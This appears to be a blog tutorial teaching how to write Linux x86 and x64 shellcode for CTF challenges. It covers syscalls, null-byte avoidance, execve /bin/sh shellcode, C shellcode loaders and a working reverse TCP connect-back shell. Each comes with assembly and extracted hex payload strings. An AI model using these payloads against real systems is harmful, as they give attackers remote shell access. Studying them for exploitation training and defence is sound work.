Linux Shellcode 101: From Hell to Shell
We all love to do CTFs, Wargames and other challenges online (well, I do). But, most of the time, when we need a shellcode we get lazy and we Google some piece of (sh!t) shellcode that just doesn’t work. And after 13 tries with different shellcodes, eventually, it works, or you just give up and grab the shellcode of someone who did solved the challenge. SHAME !
Just kidding, it happened to me, too. I mean, you solved the challenge, you got the control of the EIP, you just need a working shellcode, right ? Why, working your a$$ of ?
Why Write a Shellcode ?
Well first, if you just need a simple execve() on a /bin/sh
you should know how to write it. Second, sometimes you’ll face more complex situation where you’ll need to know how to write a custom shellcode. In those use cases, you won’t find anything online. Finally, when you do CTFs, speed is key. If you know your craft, you can write anything you want in the blink of an eye !
From C to Assembly
Ultimately, you’ll probably write your shellcode directly in assembly. However, it’s interesting to understand the full process of converting a high-level piece of code to a binary string. Let’s start with a simple C code :
// gcc -o print print.c
#include <stdio.h>
void main() {
printf("YOLO !\n");
}
Now, we can compile it and test it.
root@nms:~# gcc -o print print.c
root@nms:~# ./print
YOLO !
Here, we can use the strace
command to see the inner working of our executable. This command intercepts and records the system calls which are called by a process and the signals which are received by a process.
root@nms:~# strace ./print
execve("./print", ["./print"], 0x7fffb1ec4320 /* 22 vars */) = 0
brk(NULL) = 0x55e96fbcd000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
...[removed]...
brk(NULL) = 0x55e96fbcd000
brk(0x55e96fbee000) = 0x55e96fbee000
write(1, "YOLO !\n", 7YOLO !
) = 7
exit_group(7) = ?
+++ exited with 7 +++
The interesting parts is the call to write() which is a system call; the 4th.
Note: You can find a full reference of 32-bit system calls on https://syscalls.kernelgrok.com/.
This call takes 3 arguments. The first one is 1 which asks the syscall to print the string on the standard ouput (STDOUT). The second is a pointer to our string and the third is the size of the string (7).
ssize_t write(int fd, const void *buf, size_t count);
To use a syscall in assembly, we need to do call the interrupt 0x80 or int 0x80
. Now, we can start writing the assembly code :
; sudo apt-get install libc6-dev-i386
; nasm -f elf32 print_asm.asm
; ld -m elf_i386 print_asm.o -o print_asm
BITS 32
section .data
msg db "PLOP !", 0xa
section .text
global _start
_start:
mov eax, 4 ; syscall to write()
mov ebx, 1
mov ecx, msg
mov edx, 7
int 0x80
mov eax, 1
mov ebx, 0
int 0x80
Then, you can assemble it and link it :
root@nms:~/asm# nasm -f elf32 print_asm.asm
root@nms:~/asm# ld -m elf_i386 print_asm.o -o print_asm
root@nms:~/asm# ./print_asm
PLOP !
Alright, you have some knowledge about system calls and some basics about how to convert C code in assembly.
From Assembly To Shellcode
The next step is to convert our assembly code to a shellcode. But, what is a shellcode anyway ? Well, it’s a string that can be executed by the CPU as binary code. Here is how it looks like in hexadecimal :
root@nms:~/asm# objdump -Mintel -D print_asm
print_asm: file format elf32-i386
Disassembly of section .text:
08049000 <_start>:
8049000: b8 04 00 00 00 mov eax,0x4
8049005: bb 01 00 00 00 mov ebx,0x1
804900a: b9 00 a0 04 08 mov ecx,0x804a000
804900f: ba 07 00 00 00 mov edx,0x7
8049014: cd 80 int 0x80
8049016: b8 01 00 00 00 mov eax,0x1
804901b: bb 00 00 00 00 mov ebx,0x0
8049020: cd 80 int 0x80
Disassembly of section .data:
0804a000 <msg>:
804a000: 50 push eax
804a001: 4c dec esp
804a002: 4f dec edi
804a003: 50 push eax
804a004: 20 21 and BYTE PTR [ecx],ah
804a006: 0a .byte 0xa
Note: The <msg>
function looks like assembly code but it’s our string “PLOP !”. Objdump
interprets it as code but, as you probably know, there are no real distinctions between code and data in machine code.
The <_start>
function contains our code. But, if you look closely, there are lots of null bytes. If you try to use this string as a shellcode, the computer will interpret null bytes as string terminators so, obviously, if it starts reading your shellcode and sees a null byte it will stop and probably crash the process.
However, we often need null bytes in our code; as a parameter for a function or to declare a string variable. It’s not that hard to remove null bytes from a shellcode, you just need to be creative and find alternate way to generate the null bytes you need.
Let me show you how it’s done with our previous example :
; nasm -f elf32 print_asm_2.asm
; ld -m elf_i386 print_asm_2.o -o print_asm_2
BITS 32
section .text
global _start
_start:
xor eax, eax ; EAX = 0
push eax ; string terminator (null byte)
push 0x0a202120 ; line return (\x0a) + " ! " (added space for padding)
push 0x504f4c50 ; "POLP"
mov ecx, esp ; ESP is our string pointer
mov al, 4 ; AL is 1 byte, enough for the value 4
xor ebx, ebx ; EBX = 0
inc ebx ; EBX = 1
xor edx, edx ; EDX = 0
mov dl, 8 ; DL is 1 byte, enough for the value 8 (added space)
int 0x80 ; print
mov al, 1 ; AL = 1
dec ebx ; EBX was 1, we decrement
int 0x80 ; exit
Now, there are no null bytes ! You don’t believe me ? Check that out :
$ nasm -f elf32 print_asm_2.asm
$ ld -m elf_i386 print_asm_2.o -o print_asm_2
$ ./print_asm_2
PLOP !
$ objdump -Mintel -D print_asm_2
print_asm_2: file format elf32-i386
Disassembly of section .text:
08049000 <_start>:
8049000: 31 c0 xor eax,eax
8049002: 50 push eax
8049003: 68 20 21 20 0a push 0xa202120
8049008: 68 50 4c 4f 50 push 0x504f4c50
804900d: 89 e1 mov ecx,esp
804900f: b0 04 mov al,0x4
8049011: 31 db xor ebx,ebx
8049013: 43 inc ebx
8049014: 31 d2 xor edx,edx
8049016: b2 08 mov dl,0x8
8049018: cd 80 int 0x80
804901a: b0 01 mov al,0x1
804901c: 4b dec ebx
804901d: cd 80 int 0x80
Here, we used multiple tricks to avoid null bytes. Instead of moving 0 to a register, we XOR it, the result is the same but no null bytes:
$ rasm2 -a x86 -b 32 "mov eax, 0"
b800000000
$ rasm2 -a x86 -b 32 "xor eax, eax"
31c0
Instead of moving a 1 byte value to a 4 bytes register, we use a 1 byte register :
$ rasm2 -a x86 -b 32 "mov eax, 1"
b801000000
$ rasm2 -a x86 -b 32 "mov al, 1"
b001
And for the string, we just pushed a zero on the stack for the terminator, pushed the string value in 4 bytes chunks (reversed, because of little-endian) and used ESP as a string pointer :
xor eax, eax
push eax
push 0x0a202120 ; line return + " ! "
push 0x504f4c50 ; "POLP"
mov ecx, esp
The “shell” code
We had fun printing strings on our terminal but, where is the “shell” part of our shellcode ? Good question ! Let’s create a shellcode which actually get us a shell prompt.
To do that, we will use another syscall, execve, which is number 11 or 0xb in the syscall table. It takes 3 arguments :
- The program to execute -> EBX
- The arguments or argv (null) -> ECX
- The environment or envp (null) -> EDX
int execve(const char *filename, char *const argv[], char *const envp[]);
This time, we’ll directly write the code without any null bytes.
; nasm -f elf32 execve.asm
; ld -m elf_i386 execve.o -o execve
BITS 32
section .text
global _start
_start:
xor eax, eax
push eax ; string terminator
push 0x68732f6e ; "hs/n"
push 0x69622f2f ; "ib//"
mov ebx, esp ; "//bin/sh",0 pointer is ESP
xor ecx, ecx ; ECX = 0
xor edx, edx ; EDX = 0
mov al, 0xb ; execve()
int 0x80
Now, let’s assemble it and check if it properly works and does not contain any null bytes.
# nasm -f elf32 execve.asm
# ld -m elf_i386 execve.o -o execve
# ./execve
# id
uid=0(root) gid=0(root) groups=0(root)
# exit
# objdump -Mintel -D execve
08049000 <_start>:
8049000: 31 c0 xor eax,eax
8049002: 50 push eax
8049003: 68 6e 2f 73 68 push 0x68732f6e
8049008: 68 2f 2f 62 69 push 0x69622f2f
804900d: 89 e3 mov ebx,esp
804900f: 31 c9 xor ecx,ecx
8049011: 31 d2 xor edx,edx
8049013: b0 0b mov al,0xb
8049015: cd 80 int 0x80
Note: There are multiple ways to write the same shellcode, this is merely an example.
I know what you are thinking: “Hey, this isn’t a shellcode, it’s an executable !”, and you’re right ! This is an ELF file.
$ file execve
execve: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
As we assembled (nasm
) and linked (ld
) our code, it’s contained in an ELF but, in a real use case you don’t inject an ELF file, as the executable you target is already mapped in memory you just need to inject the code.
You can easly extract the shellcode using objdump
and some bash-fu :
$ objdump -d ./execve|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80"
Now, you can use this string or shellcode and inject it into a process.
Shellcode Loader
Now, let’s say you want to test your shellcode. First, we need something to interpret our shellcode. As you know, a shellcode is meant to be injected into a running program as it doesn’t have any function execute itself like a classic ELF. You can use the following piece of code to do that :
// gcc -m32 -z execstack exec_shell.c -o exec_shell
#include <stdio.h>
#include <string.h>
unsigned char shell[] = "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80";
main() {
int (*ret)() = (int(*)())shell;
ret();
}
Or this one, which is slightly different :
// gcc -m32 -z execstack exec_shell.c -o exec_shell
char shellcode[] =
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80";
int main(int argc, char **argv) {
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}
Note: You can find some information about those C code here.
Connect-Back or Reverse TCP Shellcode
We could do a Bind TCP shellcode but, nowadays, firewalls block most of the incoming connection so we prefer that the shellcode automatically connect back to our machine. The main idea to this shellcode is to connect to our machine, on a specific port, and give us a shell. First, we need to create a socket with the socket() system call and connect the socket to the address of the server (our machine) using the connect() system call.
The socket syscall is called socketcall() and use the number 0x66. It takes 2 arguments :
- The type of socket, here SYS_SOCKET or 1 -> EBX
- The args, a pointer to the block containing the actual arguments -> ECX
int socketcall(int call, unsigned long *args);
There are 3 arguments for a call to socket():
- The communication domain, here, AF_INET (2) or IPv4
- The socket type, SOCK_STREAM (1) or TCP
- The protocol to use, which is 0 because only a single protocol exists with TCP
int socket(int domain, int type, int protocol);
Once, we created a socket, we need to connect to the remote machine using SYS_CONNECT or 3 type with the argument for connect(). Again, we reuse the syscall number 0x66 but with the following arguments :
- The type of socket, here SYS_CONNECT or 3 -> EBX
- The args, a pointer to the block containing the actual arguments -> ECX
There are 3 arguments for a call to connect():
- The file descriptor previously created with socket()
- The pointer to sockaddr structure containing the IP, port and address family (AF_INET)
- The addrlen argument which specifies the size of sockaddr, or 16 bytes.
int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
Just so you know, here is the definition of the sockaddr structure :
struct sockaddr {
sa_family_t sa_family; /* address family, AF_xxx */
char sa_data[14]; /* 14 bytes of protocol address */
};
Now, let’s write that down :
; nasm -f elf32 connectback.asm
; ld -m elf_i386 connectback.o -o connectback
BITS 32
section .text
global _start
_start:
; Call to socket(2, 1, 0)
push 0x66 ; socketcall()
pop eax
xor ebx, ebx
inc ebx ; EBX = 1 for SYS_SOCKET
xor edx, edx ; Bulding args array for socket() call
push edx ; proto = 0 (IPPROTO_IP)
push BYTE 0x1 ; SOCK_STREAM
push BYTE 0x2 ; AF_INET
mov ecx, esp ; ECX contain the array pointer
int 0x80 ; After the call, EAX contains the file descriptor
xchg esi, eax ; ESI = fd
; Call to connect(fd, [AF_INET, 4444, 127.0.0.1], 16)
push 0x66 ; socketcall()
pop eax
mov edx, 0x02010180 ; Trick to avoid null bytes (128.1.1.2)
sub edx, 0x01010101 ; 128.1.1.2 - 1.1.1.1 = 127.0.0.1
push edx ; store 127.0.0.1
push WORD 0x5c11 ; push port 4444
inc ebx ; EBX = 2
push WORD bx ; AF_INET
mov ecx, esp ; pointer to sockaddr
push BYTE 0x10 ; 16, size of addrlen
push ecx ; new pointer to sockaddr
push esi ; fd pointer
mov ecx, esp ; ECX contain the array pointer
inc ebx ; EBX = 3 for SYS_CONNECT
int 0x80 ; EAX contains the connected socket
Now assemble and link the shellcode then, open a listener in another shell and run the code :
$ nc -lvp 4444
listening on [any] 4444 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 51834
Your shellcode will segfault, but that’s normal. However, you should receive a connection on your listener. Now, we need to implement the shell part of our shellcode. To do that, we will have to play with the file descriptors. There are 3 standard file descriptors :
- stdin or 0 (input)
- stdout or 1 (output)
- stderr or 2 (error)
The idea is to duplicate the standard file descriptors on the file descriptor obtained with the call to connect() then, call /bin/sh. That way, we will be able to have a reverse shell on the target machine.
There is syscall called dup2, number 0x3f, which can help us with that task. It takes 2 arguments :
- The old fd -> EBX
- The new fd -> ECX
int dup2(int oldfd, int newfd);
Let’s implement the rest of the code :
; Call to dup2(fd, ...) with a loop for the 3 descriptors
xchg eax, ebx ; EBX = fd for connect()
push BYTE 0x2 ; we start with stderr
pop ecx
loop:
mov BYTE al, 0x3f ; dup2()
int 0x80
dec ecx
jns loop ; loop until sign flag is set meaning ECX is negative
; Call to execve()
xor eax, eax
push eax ; string terminator
push 0x68732f6e ; "hs/n"
push 0x69622f2f ; "ib//"
mov ebx, esp ; "//bin/sh",0 pointer is ESP
xor ecx, ecx ; ECX = 0
xor edx, edx ; EDX = 0
mov al, 0xb ; execve()
int 0x80
Re-assemble the shellcode with the added routine and run a listener, you should get a shell :
$ ./connectback
# id
uid=0(root) gid=0(root) groups=0(root)
You can try to extract the shellcode, it should be null byte free :)
objdump -d ./connectback|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x6a\x66\x58\x31\xdb\x43\x31\xd2\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x96\x6a\x66\x58\xba\x80\x01\x01\x02\x81\xea\x01\x01\x01\x01\x52\x66\x68\x11\x5c\x43\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\x43\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80"
x64 Shellcode
We assume that you already know 64-bit assembly code, if you don’t, well, it’s almost the same as 32-bit instructions… Anyway, 64-bit shellcode is as easy as the 32-bit ones.
Note: You can find lots of references for 64-bit system calls on Internet, like this one.
The main difference are :
- Instead of calling
ìnt 0x80
to trigger the syscall, we use thesyscall
instruction - Registers are 64-bit (O RLY ?!)
- The execve() syscall is 59 (integer)
- Instead of using EAX, EBX, ECX, etc. for the syscall, it’s RAX, RDI, RSI, RDX, etc.
Let’s try to reproduce the execve() shellcode we did earlier.
; nasm -f elf64 execve64.asm
; ld -m elf_x86_64 execve64.o -o execve64
section .text
global _start
_start:
xor rax, rax
push rax ; string terminator
mov rax, 0x68732f6e69622f2f ; "hs/nib//" (Yay! 64-bit registers)
push rax
mov rdi, rsp ; "//bin/sh",0 pointer is RSP
xor rsi, rsi ; RSI = 0
xor rdx, rdx ; RDX = 0
xor rax, rax ; RAX = 0
mov al, 0x3b ; execve()
syscall
Note: Here, we didn’t directly pushed the string on the stack because pushing a 64-bit immediate value is not possible. So, we used RAX as an intermediate register.
Now, you can try it. Note that the compilation arguments have changed.
$ nasm -f elf64 execve64.asm
$ ld -m elf_x86_64 execve64.o -o execve64
$ ./execve64
# id
uid=0(root) gid=0(root) groups=0
Easy, right ?
$ objdump -d ./execve64|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x48\x31\xc0\x50\x48\xb8\x2f\x2f\x62\x69\x2f\x73\x68\x50\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\xb0\x3b\x0f\x05"
Your turn now, make them smaller, make them smarter !